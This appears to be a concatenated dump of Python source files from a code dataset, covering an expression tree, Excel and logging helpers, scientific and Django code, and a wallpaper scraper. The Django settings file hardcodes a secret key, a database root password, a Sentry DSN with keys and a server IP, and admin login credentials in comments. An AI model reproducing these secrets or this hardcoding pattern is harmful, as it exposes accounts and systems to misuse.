\"+-*/^()\"\n # remove all whitespaces\n clean_exp = \"\".join(infix_exp.split())\n print(f\"clean_exp: {clean_exp}\")\n clean_format = []\n i = 0\n\n while i < len(clean_exp):\n char = clean_exp[i]\n print(f\"char: {char}\")\n if char in operators:\n clean_format.append(char)\n i += 1\n else:\n num = \"\"\n # if we see num, extract the full number not just 1 digit\n while char not in operators:\n char = clean_exp[i]\n num += char\n i += 1\n # just the number part\n clean_format.append(num[:-1])\n # operator\n clean_format.append(num[-1])\n return clean_format\n\n\nif __name__ == \"__main__\":\n # user_input = \"((2+5)+(7-3))*((9-1)/(4-2))\"\n # expr = \"(((10+2.2) + (5.4))^2) \"\n user_input = \"((2+5)/3)-(3+8)\"\n \n # ignore the script and grab the user expression\n # user_input = sys.argv[1:]\n tree_obj = BinaryExpressionTree(user_input)\n \n print(f\"Tree: {tree_obj}\")\n print(tree_obj.items_in_order())\n print(tree_obj.evaluate())\n \n \n #===============Test postfix conversion====================#\n # infix = \"((2+5)+(7-3))*((9-1)/(4-2))\"\n # # expected = \"kl+mn*-op^w*u/v/t*+q+\"\n # postfix = infix_to_postfix(expr)\n # print(f\"postfix: {postfix}\")\n\n # dirty = \"((10^2) + (300/20)) \"\n # clean = _clean_input(dirty)\n # print(f\"dirty: {dirty}, clean: {clean}\")\n","sub_path":"binary_expression_tree.py","file_name":"binary_expression_tree.py","file_ext":"py","file_size_in_byte":11160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"71848207","text":"import xlrd\nfrom xlutils.copy import copy\n\n\nclass Read_Excel(object):\n def __init__(self, file_path='E:\\LX_selenium\\config\\case.xls', index=0):\n if file_path:\n self.file_path = file_path\n self.index = index\n self.data = self.get_data()\n\n def get_data(self):\n '''获取excel数据'''\n data = xlrd.open_workbook(filename=self.file_path)\n sheet = data.sheet_by_index(sheetx=self.index)\n return sheet\n\n def get_nrows(self):\n '''获取excel数据行数'''\n if self.data.nrows >= 1:\n return self.data.nrows\n return None\n\n def get_data_list(self):\n '''获取全部行数据的列表'''\n data_list = []\n if self.get_nrows() != None:\n for i in range(self.get_nrows()):\n row_data = self.get_data().row_values(i)\n data_list.append(row_data)\n return data_list\n return None\n\n def get_cell_value(self, row, col):\n '''获取单元格数据'''\n if self.get_nrows() >= row:\n return self.data.cell_value(rowx=row, colx=col)\n return None\n\n def write_value(self, row, col, value):\n '''写入单元格数据'''\n book1 = xlrd.open_workbook(self.file_path)\n book2 = copy(book1)\n sheet_data = book2.get_sheet(0)\n sheet_data.write(row, col, value)\n book2.save(self.file_path)\n\n def get_except_value(self, data):\n '''获取预期结果值'''\n return data.split('=')\n\n\nif __name__ == '__main__':\n ex = Read_Excel('E:\\LX_selenium\\config\\key_case.xls')\n print(ex.get_nrows())\n print(ex.get_cell_value(10, 2))\n # ex.write_value(4, 0, 'pass')\n","sub_path":"util/read_excel.py","file_name":"read_excel.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"598751307","text":"import logging\nfrom logging.handlers import QueueHandler, QueueListener\nfrom queue import Queue\nimport sys\n\n\nclass Logger:\n def __init__(self):\n console_queue = Queue(-1) # no limit on size\n console_queue_handler = QueueHandler(console_queue)\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setLevel(logging.CRITICAL)\n console_handler.setFormatter(logging.Formatter('%(levelname)s:\\t%(message)s'))\n self.console_listener = QueueListener(console_queue, console_handler, respect_handler_level=True)\n\n file_queue = Queue(-1) # no limit on size\n file_queue_handler = QueueHandler(file_queue)\n file_handler = logging.FileHandler(\"results.csv\", \"w\", \"utf-8\")\n file_handler.setLevel(logging.INFO)\n file_handler.setFormatter(logging.Formatter('%(message)s'))\n self.file_listener = QueueListener(file_queue, file_handler, respect_handler_level=True)\n\n self.logger = logging.getLogger()\n self.logger.setLevel(logging.DEBUG)\n self.logger.addHandler(console_queue_handler)\n self.logger.addHandler(file_queue_handler)\n\n def start(self):\n self.console_listener.start()\n self.file_listener.start()\n\n def stop(self):\n self.console_listener.stop()\n self.file_listener.stop()\n\n def info(self, msg):\n self.logger.info(msg)\n\n def debug(self, msg):\n self.logger.debug(msg)\n\n def critical(self, msg):\n self.logger.critical(msg)\n","sub_path":"logger_old.py","file_name":"logger_old.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"623408344","text":"\ndef f_x(x):\n ret=x**4 -3*x**3+2\n return ret\n\ndef f_prime_x(x):\n ret=4*x**3-9*x**2\n return ret\n\ndef gradient_descent():\n x_old=0.0\n x_new=6.0\n precission=0.00001\n max_iter=1000\n # learning_rate=0.01\n learning_rate=0.0001\n# learning_rate=0.1\n iter=0\n\n while abs(x_new-x_old)>precission and iter triage_k + 1:\n if location_feature:\n th = (1 - triage_percent/2)*100\n\n # get distance to nearest neighbors\n tree = cKDTree(scores_channel[:, :2])\n dist, ind = tree.query(scores_channel[:, :2], k=triage_k + 1)\n dist = np.sum(dist, 1)\n # triage far ones\n idx_triage[idx_data[dist > np.percentile(dist, th)]] = 1\n\n # get distance to nearest neighbors\n tree = cKDTree(scores_channel[:, 2:])\n dist, ind = tree.query(scores_channel[:, 2:], k=triage_k + 1)\n dist = np.sum(dist, 1)\n # triage far ones\n idx_triage[idx_data[dist > np.percentile(dist, th)]] = 1\n\n else:\n # get distance to nearest neighbors\n tree = cKDTree(scores_channel)\n dist, ind = tree.query(scores_channel, k=triage_k + 1)\n dist = np.sum(dist, 1)\n\n # triage far ones\n idx_triage[idx_data[dist > np.percentile(dist, th)]] = 1\n\n idx_triage = np.where(idx_triage)[0]\n scores = np.delete(scores, idx_triage, 0)\n spike_index = np.delete(spike_index, idx_triage, 0)\n\n return scores, spike_index\n","sub_path":"src/yass/cluster/triage.py","file_name":"triage.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"371952675","text":"class Solution:\n def maxProduct(self, nums: List[int]) -> int:\n res = imin = imax = nums[0]\n for num in nums[1:]:\n if num < 0:\n imin, imax = imax, imin\n imin = min(imin * num, num)\n imax = max(imax * num, num)\n res = max(res, imax)\n return res\n","sub_path":"152.py","file_name":"152.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"616807124","text":"# 5185 / convert binary from hecadecimal\nfor T in range(int(input())):\n N, bit = input().split()\n\n print(f'#{T + 1}', end=' ')\n for i in range(int(N)):\n if bit[i] in '0123456789':\n digit = ord(bit[i]) - ord('0')\n else:\n digit = ord(bit[i]) - ord('A') + 10\n\n for j in range(3, -1, -1):\n if not digit & (1 << j):\n print('0', end='')\n else:\n print('1', end='')\n print()\n","sub_path":"Course/Advanced/5185.py","file_name":"5185.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"178599440","text":"import sqlite3\nimport csv\nimport codecs\nimport db_util\nimport json\nimport time\nimport logger\n\nclass ChineseWriter:\n \"\"\"\n A CSV writer which will write (Chinese) rows to CSV file \"f\", \n which is encoded in utf-8.\n \"\"\"\n\n def __init__(self, f, dialect=csv.excel, encoding=\"utf-8\", **kwds):\n # Redirect output to a queue\n f.write(codecs.BOM_UTF8)\n self.writer = csv.writer(f, dialect=dialect, **kwds)\n\n def writerow(self, row):\n self.writer.writerow([unicode(s).encode(\"utf-8\") for s in row])\n\n def writerows(self, rows):\n for row in rows:\n self.writerow(row)\n\ndef table_to_csv(db, sql, out='weibos.csv', headers=None):\n\trows = db_util.execute(db, sql)\n\trows = pre_process(rows)\n\twriter = ChineseWriter(open(out, \"wb\"))\n\tif headers is not None:\n\t\twriter.writerow(headers)\n\twriter.writerows(rows)\n\ndef pre_process(rows):\n\tde_jsonfied_rows = []\n\tpic = headers.index('pic_infos')\n\tretweet = headers.index('retweeted_status')\n\tfor row in rows:\n\t\ttemp = [json.loads(item) if isinstance(item, unicode) else item for item in row]\n\t\ttemp = [item.replace('\\n', '\\\\n') if isinstance(item, unicode) else item for item in temp]\n\t\tif temp[pic] != '':\n\t\t\tpic_infos = temp[pic]\n\t\t\tpics = [pic_infos[ind]['largest']['url'] for ind in pic_infos]\n\t\t\tpics = ','.join(pics)\n\t\t\ttemp[pic] = pics\n\t\tif temp[retweet] != '':\n\t\t\tretweeted_text = temp[retweet]['text']\n\t\t\ttemp[retweet] = retweeted_text\n\t\tde_jsonfied_rows.append(temp)\n\treturn de_jsonfied_rows\n\n#def byteify(input):\n# if isinstance(input, dict):\n# return {byteify(key): byteify(value)\n# for key, value in input.iteritems()}\n# elif isinstance(input, list):\n# return [byteify(element) for element in input]\n# elif isinstance(input, unicode):\n# return input.encode('utf-8')\n# else:\n# return input\n\n\nheaders = ['uid', 'mid', 'reposts_count', 'comments_count', 'attitudes_count', 'text', 'retweeted_status', 'pic_infos', 'source', 'created_at', 'created_time', 'geo', 'deleted']\n\ndef last_deleted_weibos_to_csv(db, uid, del_time=None, out='weibos.csv'):\n\tif del_time is None:\n\t\tsql = 'select distinct deleted from status where uid=%s order by deleted desc limit 1' % uid\n\t\tdel_time = db_util.execute(db, sql)[0]\n\tsql = ''\n\tfor header in headers:\n\t\tsql += header\n\t\tsql += ', '\n\tsql = sql[:-2]\n\tsql = 'SELECT ' + sql + ' FROM status WHERE deleted=%d ORDER BY created_time' % (del_time)\n\ttable_to_csv(db, sql, out, headers)\n\ndef all_weibos_to_csv(db, uid, out='weibos.csv'):\n\tsql = ''\n\tfor header in headers:\n\t\tsql += header\n\t\tsql += ', '\n\tsql = sql[:-2]\n\tsql = 'SELECT ' + sql + ' FROM status WHERE uid=%s ORDER BY created_time' % uid\n\ttable_to_csv(db, sql, out, headers)\n\ndef export_all(config):\n\tdb = config['db']\n\tfor entry in config['tasks']:\n\t\tuid = entry['uid']\n\t\tuname = entry['name']\n\t\tout = uname + '_all_' + time.strftime(\"%Y-%m-%d\") + '.csv'\n\t\tall_weibos_to_csv(db, uid, out)\n\t\tlogger.log('[x] Export %s\\'s weibo to %s' % (uid, out), 'green')\n\ndef test():\n\tall_weibos_to_csv('t7.db', '3675868752', 'FXD_test.csv')\n\nif __name__ == \"__main__\":\n\ttest()","sub_path":"util/weibo_writer.py","file_name":"weibo_writer.py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"69171023","text":"\"\"\"\nCopyright 2020 The OneFlow Authors. All rights reserved.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nfrom typing import Optional, Sequence\n\nimport oneflow as flow\nfrom oneflow.framework.tensor import register_tensor_op\n\n\n@register_tensor_op(\"permute\")\ndef permute_op(input, *dims):\n \"\"\"Returns a view of the original tensor with its dimensions permuted.\n\n Args:\n *dims (int...): The desired ordering of dimensions\n\n For example:\n\n .. code-block:: python\n\n >>> import numpy as np\n >>> import oneflow as flow\n \n >>> input = flow.tensor(np.random.randn(2, 6, 5, 3), dtype=flow.float32)\n >>> out = input.permute(1, 0, 2, 3).shape\n >>> out\n oneflow.Size([6, 2, 5, 3])\n\n \"\"\"\n\n perm = list(dims)\n assert len(perm) == len(input.shape)\n new_perm = []\n for dim in perm:\n if dim < 0:\n dim += len(perm)\n assert dim >= 0 and dim < len(\n input.shape\n ), \"Invalid dim0 {}, len(shape): {}\".format(dim, len(input.shape))\n new_perm.append(dim)\n return flow._C.transpose(input, perm=new_perm)\n\n\nif __name__ == \"__main__\":\n import doctest\n\n doctest.testmod(raise_on_error=True)\n","sub_path":"python/oneflow/nn/modules/permute.py","file_name":"permute.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"654037036","text":"from __future__ import division, print_function, absolute_import\n \nimport numpy as np\nimport pandas as pd\nimport cooler\nimport h5py\nimport logging\n \nlogger = logging.getLogger(__name__)\n \nTILE_SIZE = 256\n\n\ndef abs_coord_2_bin(c, abs_pos, chroms, chrom_cum_lengths, chrom_sizes):\n \"\"\"Get bin ID from absolute coordinates.\n \n Args:\n c (Cooler): Cooler instance of a .cool file.\n abs_pos (int): Absolute coordinate to be translated.\n \n Returns:\n int: Bin number.\n \"\"\"\n \n try:\n chr_id = np.flatnonzero(chrom_cum_lengths > abs_pos)[0] - 1\n except IndexError:\n return c.info['nbins']\n \n chrom = chroms[chr_id]\n rel_pos = abs_pos - chrom_cum_lengths[chr_id]\n \n return c.offset((chrom, rel_pos, chrom_sizes[chrom]))\n\n\ndef get_chromosome_names_cumul_lengths(c):\n '''\n Get the chromosome names and cumulative lengths:\n \n Args:\n \n c (Cooler): A cooler file\n \n Return:\n \n (names, sizes, lengths) -> (list(string), dict, np.array(int))\n '''\n chrom_names = c.chromnames\n chrom_sizes = dict(c.chromsizes)\n chrom_cum_lengths = np.r_[0, np.cumsum(c.chromsizes.values)]\n return chrom_names, chrom_sizes, chrom_cum_lengths\n \n \ndef get_data(f, start_pos_1, end_pos_1, start_pos_2, end_pos_2, transform='default'):\n \"\"\"Get balanced pixel data.\n \n Args:\n f: h5py.File\n An HDF5 Group that contains the cooler for this resolution\n start_pos_1 (int): Test.\n end_pos_1 (int): Test.\n start_pos_2 (int): Test.\n end_pos_2 (int): Test.\n \n Returns:\n DataFrame: Annotated cooler pixels.\n \"\"\"\n \n c = cooler.Cooler(f)\n \n (chroms, chrom_sizes, chrom_cum_lengths) = get_chromosome_names_cumul_lengths(c)\n \n i0 = abs_coord_2_bin(c, start_pos_1, chroms, chrom_cum_lengths, chrom_sizes)\n i1 = abs_coord_2_bin(c, end_pos_1, chroms, chrom_cum_lengths, chrom_sizes)\n\n j0 = abs_coord_2_bin(c, start_pos_2, chroms, chrom_cum_lengths, chrom_sizes)\n j1 = abs_coord_2_bin(c, end_pos_2, chroms, chrom_cum_lengths, chrom_sizes)\n\n '''\n print('i', i0, i1)\n print('j', j0, j1)\n '''\n matrix = c.matrix(as_pixels=True, balance=False, max_chunk=np.inf)\n\n if i0 >= matrix.shape[0] or j0 >= matrix.shape[1]:\n # query beyond the bounds of the matrix\n # return an empty matrix\n i0,i1,i1,j1 = 0,0,0,0\n else:\n # limit the range of the query to be within bounds\n i1 = min(i1, matrix.shape[0]-1)\n j1 = min(j1, matrix.shape[1]-1)\n\n #print(\"size\", matrix.shape)\n\n pixels = matrix[i0:i1+1, j0:j1+1]\n\n if not len(pixels):\n return pd.DataFrame(columns=['genome_start1', 'genome_start2', 'balanced'])\n \n # select bin columns to extract\n cols = ['chrom', 'start', 'end']\n if (transform == 'default' and 'weight' in c.bins()) or transform == 'weight':\n cols.append('weight')\n elif transform in ('KR', 'VC', 'VC_SQRT'):\n cols.append(transform)\n\n bins = c.bins(convert_enum=False)[cols] \n pixels = cooler.annotate(pixels, bins)\n pixels['genome_start1'] = chrom_cum_lengths[pixels['chrom1']] + pixels['start1']\n pixels['genome_start2'] = chrom_cum_lengths[pixels['chrom2']] + pixels['start2']\n\n # apply transform\n if (transform == 'default' and 'weight' in c.bins()) or transform == 'weight':\n pixels['balanced'] = (\n pixels['count'] * pixels['weight1'] * pixels['weight2']\n )\n return pixels[['genome_start1', 'genome_start2', 'balanced']]\n elif transform in ('KR', 'VC', 'VC_SQRT'):\n pixels['balanced'] = (\n pixels['count'] / pixels[transform+'1'] / pixels[transform+'2']\n )\n return pixels[['genome_start1', 'genome_start2', 'balanced']]\n else:\n return pixels[['genome_start1', 'genome_start2', 'count']]\n\n \ndef get_info(file_path):\n \"\"\"Get information of a cooler file.\n \n Args:\n file_path (str): Path to a cooler file.\n \n Returns:\n dict: Dictionary containing basic information about the cooler file.\n \"\"\"\n \n with h5py.File(file_path, 'r') as f:\n max_zoom = f.attrs.get('max-zoom')\n \n if max_zoom is None:\n logger.info('no zoom found')\n raise ValueError(\n 'The `max_zoom` attribute is missing.'\n )\n \n c = cooler.Cooler(f[\"0\"])\n \n (chroms, chrom_sizes, chrom_cum_lengths) = get_chromosome_names_cumul_lengths(c)\n \n total_length = int(chrom_cum_lengths[-1])\n max_zoom = f.attrs['max-zoom']\n bin_size = int(f[str(max_zoom)].attrs['bin-size'])\n \n max_width = bin_size * TILE_SIZE * 2**max_zoom\n \n # the list of available data transforms\n transforms = {}\n \n for i in range(max_zoom):\n f_for_zoom = f[str(i)]['bins']\n\n if 'weight' in f_for_zoom:\n transforms['weight'] = {'name': 'ICE', 'value': 'weight'}\n if 'KR' in f_for_zoom:\n transforms['KR'] = {'name': 'KR', 'value': 'KR'}\n if 'VC' in f_for_zoom:\n transforms['VC'] = {'name': 'VC', 'value': 'VC'}\n if 'VC_SQRT' in f_for_zoom:\n transforms['VC_SQRT'] = {'name': 'VC_SQRT', 'value': 'VC_SQRT'}\n\n info = {\n 'min_pos': [0.0, 0.0],\n 'max_pos': [total_length, total_length],\n 'max_zoom': max_zoom,\n 'max_width': max_width,\n 'bins_per_dimension': TILE_SIZE,\n 'transforms': transforms.values()\n }\n \n return info\n\n\ndef get_quadtree_depth(chromsizes, binsize):\n \"\"\"\n Depth of quad tree necessary to tesselate the concatenated genome with quad\n tiles such that linear dimension of the tiles is a preset multiple of the \n genomic resolution.\n\n \"\"\"\n tile_size_bp = TILE_SIZE * binsize\n min_tile_cover = np.ceil(sum(chromsizes) / tile_size_bp)\n return int(np.ceil(np.log2(min_tile_cover)))\n\n\ndef get_zoom_resolutions(chromsizes, base_res):\n return [base_res * 2**x for x in range(get_quadtree_depth(chromsizes, base_res)+1)]\n\n\ndef print_zoom_resolutions(chromsizes_file, base_res):\n \"\"\"\n Print comma-separated list of zoom resolutions for a given genome\n and base resolution.\n\n \"\"\"\n chromsizes = cooler.util.read_chromsizes(chromsizes_file, all_names=True)\n resolutions = get_zoom_resolutions(chromsizes, base_res)\n print(','.join(str(res) for res in resolutions))\n","sub_path":"cooler/contrib/higlass.py","file_name":"higlass.py","file_ext":"py","file_size_in_byte":6424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"84230187","text":"from operator import attrgetter\n\nfrom typing import (\n Iterator,\n List,\n Dict\n)\n\nfrom core.methods import Method\nfrom core.models import Token\n\n\ndef build_groups(\n normalized_tokens: List[Token],\n method: Method,\n convergence: float\n) -> Dict[str, Token]:\n groups = dict()\n\n while len(normalized_tokens) > 0:\n group_key = normalized_tokens.pop(0)\n group_variants = [group_key]\n\n for i in range(len(normalized_tokens) - 1, -1, -1):\n score = method.score(\n w1=normalized_tokens[i].term,\n w2=group_key.term\n )\n\n if score >= convergence:\n group_token = normalized_tokens.pop(i)\n group_token.convergence = score\n\n group_variants.append(group_token)\n\n group_value = sum((x.value for x in group_variants))\n group_value = group_value / float(len(group_variants))\n\n groups[group_key.term] = Token(\n term=group_key.term,\n value=group_value\n )\n\n return groups\n\n\ndef where(\n tokens: Iterator[Token],\n attribute: str,\n operator: str,\n criterion: float,\n orderby: str,\n reverse: bool = True,\n) -> List[Token]:\n if operator not in ['ge', 'gt', 'le', 'lt', 'eq', 'ne']:\n raise ValueError('Operator not found')\n\n operator = '__{operator}__'.format(\n operator=operator\n )\n\n generator = (\n token for token in tokens\n if getattr(getattr(token, attribute), operator)(criterion)\n )\n\n return sorted(generator, key=attrgetter(orderby), reverse=reverse)\n\n\ndef normalize(tokens: Iterator[Token]) -> Iterator[Token]:\n max_score = max((token.value for token in tokens))\n\n for token in tokens:\n yield Token(\n term=token.term,\n value=token.value / max_score\n )\n","sub_path":"STG/core/terms.py","file_name":"terms.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"92148651","text":"#Алгоритм Евклида\r\n#1.Большее число делим на меньшее\r\n#2.Если делится без остатка, то меньшее число и есть НОД\r\n#3.Если есть остаток, то большее число заменяем на остаток от деления\r\n#4.Переходим к пункту 1.\r\na = 8\r\nb = 8\r\n \r\nwhile a!=0 and b!=0:\r\n if a > b:\r\n a = a % b\r\n else:\r\n b = b % a\r\n \r\nprint (a+b)","sub_path":"evklid 2.py","file_name":"evklid 2.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"399007113","text":"\"\"\"Create Link\n\nRevision ID: 979da018b72b\nRevises: 99e314ce223a\nCreate Date: 2017-03-22 10:22:16.855758\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '979da018b72b'\ndown_revision = '99e314ce223a'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('links',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('url', sa.String(length=512), nullable=False),\n sa.Column('spring', sa.String(length=6), nullable=False),\n sa.Column('created', sa.DateTime(), nullable=True),\n sa.Column('clicked', sa.Integer(), nullable=True),\n sa.Column('owner_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['owner_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('owner_id', 'url', name='owner_url_uni'),\n sa.UniqueConstraint('spring')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('links')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/979da018b72b_create_link.py","file_name":"979da018b72b_create_link.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"271525629","text":"import requests\nimport parsel\nfor page in range(1,6):\n print('==========正在爬取第{}页数据============='.format(page))\n base_url = \"http://www.win4000.com/sjzt/keai_{}.html\".format(page)\n headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36 Edg/80.0.361.109'}\n\n\n response = requests.get(base_url,headers=headers)\n date = response.text\n\n html_date = parsel.Selector(date)\n\n data_list = html_date.xpath('//div[@class=\"Left_bar\"]//ul/li/a/@href').extract()\n # print(data_list)\n for alist in data_list:\n response2 = requests.get(alist,headers=headers).text\n #提取图片的url地址\n html_2 = parsel.Selector(response2)#转换数据类型\n img_url = html_2.xpath('//div[@class=\"pic-meinv\"]/a/img/@src').extract_first() #只提取一个数据\n # print(img_url)\n #请求图片数据\n img_date = requests.get(img_url,headers=headers).content #提取二进制数据 使用content方法\n\n #保存数据\n #1、准备文件名\n file_name = img_url.split('/')[-1]\n with open('img\\\\'+file_name,mode='wb') as f:\n print('正在保存文件',file_name)\n f.write(img_date)\n","sub_path":"office_automatiion/抓取可爱壁纸.py","file_name":"抓取可爱壁纸.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"59307478","text":"# -*- coding:utf-8 -*-\n\"\"\"\nDjango settings for shuishui project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(__file__)\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '+^h^odqy2v)dp7uczj*d+!_810%7j=709(^$_rtdux89l85ul0'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = False\nIS_ONLINE = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = ['*']\n\n\n# Application definition\n\nSHUISHUI_APPS = (\n 'sns',\n 'base'\n)\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n) + SHUISHUI_APPS\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'base.middleware.elapsedtime.ElapsedTime',\n)\n\nROOT_URLCONF = 'urls'\n\nWSGI_APPLICATION = 'wsgi.application'\n\n# 后台账号密码为 liuzongrun 111111\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': 'shuishui',\n 'USER': 'root',\n 'PASSWORD': 'bigbossliu',\n 'HOST': '',\n 'PORT': '',\n 'OPTIONS': {'charset': 'utf8mb4'},\n 'ATOMIC_REQUESTS': True,\n },\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'zh-hans'\n\nTIME_ZONE = 'Asia/Shanghai'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nSTATIC_URL = '/static/'\n# python manage.py collectstatic 命令会将各个app的static的复制到这里\nSTATIC_ROOT = BASE_DIR + \"/static/\"\n\nLOGS_BASE_DIR = os.path.join(BASE_DIR, \"log\")\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(filename)s %(funcName)s [line:%(lineno)d] %(message)s'\n },\n 'simple': {\n 'format': '%(levelname)s %(message)s'\n },\n },\n\n 'handlers': {\n 'null': {\n 'level': 'DEBUG',\n 'class': 'django.utils.log.NullHandler',\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'simple'\n },\n 'mail_admins': {\n 'level': 'ERROR',\n 'class': 'django.utils.log.AdminEmailHandler'\n },\n\n # 默认的log,当程序内直接调用logging时,log内容会写入log/default.log\n 'default': {\n 'level': 'INFO',\n 'class': 'logging.handlers.WatchedFileHandler',\n 'filename': os.path.join(LOGS_BASE_DIR, 'default.log'),\n 'formatter': 'verbose',\n },\n ## 默认的服务器ERROR log\n 'default_err': {\n 'level': 'ERROR',\n 'class': 'logging.handlers.WatchedFileHandler',\n 'filename': os.path.join(LOGS_BASE_DIR, 'error_logger.log'),\n 'formatter': 'verbose',\n },\n ## 存放每一个请求的信息\n 'elapsed_logger': {\n 'level': 'INFO',\n 'class': 'logging.handlers.WatchedFileHandler',\n 'filename': os.path.join(LOGS_BASE_DIR, 'elapsed_logger.log'),\n 'formatter': 'verbose',\n },\n ## 调用logging_exception时存异常入这个文件\n 'exception_logger': {\n 'level': 'INFO',\n 'class': 'logging.handlers.WatchedFileHandler',\n 'filename': os.path.join(LOGS_BASE_DIR, 'exception_logger.log'),\n 'formatter': 'verbose',\n },\n ## 这里借助logging的FileHandler获取error信息\n 'error_handler': {\n 'level': 'INFO',\n 'class': 'code.error_handler.ErrorHandler',\n 'filename': os.path.join(LOGS_BASE_DIR, 'fuck.log'),\n 'formatter': 'verbose',\n },\n },\n\n 'loggers': {\n 'django': {\n 'handlers': ['default'],\n # 这个参数表示这个logger不会被项目别的地方捕捉(个人简单理解,暂时还是比较疑惑)\n 'propagate': False,\n 'level': 'INFO',\n },\n 'django.request': {\n 'handlers': ['default_err'],\n 'level': 'ERROR',\n 'propagate': False,\n },\n 'elapsed_logger': {\n 'handlers': ['elapsed_logger'],\n 'level': 'INFO',\n 'propagate': False,\n },\n 'exception_logger': {\n 'handlers': ['exception_logger'],\n 'level': 'INFO',\n 'propagate': False,\n },\n }\n}\n\n#sentry的配置 登录的账号liuzongrun 密码111111\nRAVEN_CONFIG = {\n 'dsn': 'http://483c3952b67247de91cb039622da7966:93a97682c316413db8092d597b3ef1a5@182.92.11.6:9000/2',\n 'sync': True,\n 'enabled': True,\n}\n\nINSTALLED_APPS = INSTALLED_APPS + (\n 'raven.contrib.django.raven_compat',\n)\n\n","sub_path":"settings_online.py","file_name":"settings_online.py","file_ext":"py","file_size_in_byte":5562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"394759513","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport json\nimport sys\n\nif len(sys.argv) < 2:\n sys.stderr.write('USAGE: {} \\n'.format(sys.argv[0]))\n sys.exit(1)\n\nfor line in sys.stdin:\n line = line.strip('\\n')\n d = json.loads(line)\n\n if d['title'] == 'ISO 3166-1':\n with open(sys.argv[1], 'w') as fo:\n fo.write(line)\n fo.write('\\n')\n\n if d['title'].startswith('Wikipedia:'):\n continue\n\n stop = False\n summary = ''\n category = []\n for line in d['text'].split('\\n'):\n if line.startswith('==') and line.endswith('=='):\n stop = True\n if line.startswith('[[Category:') and line[-2:] == ']]':\n category.append(line[11:-2])\n if not stop:\n summary += line\n summary += '\\n'\n 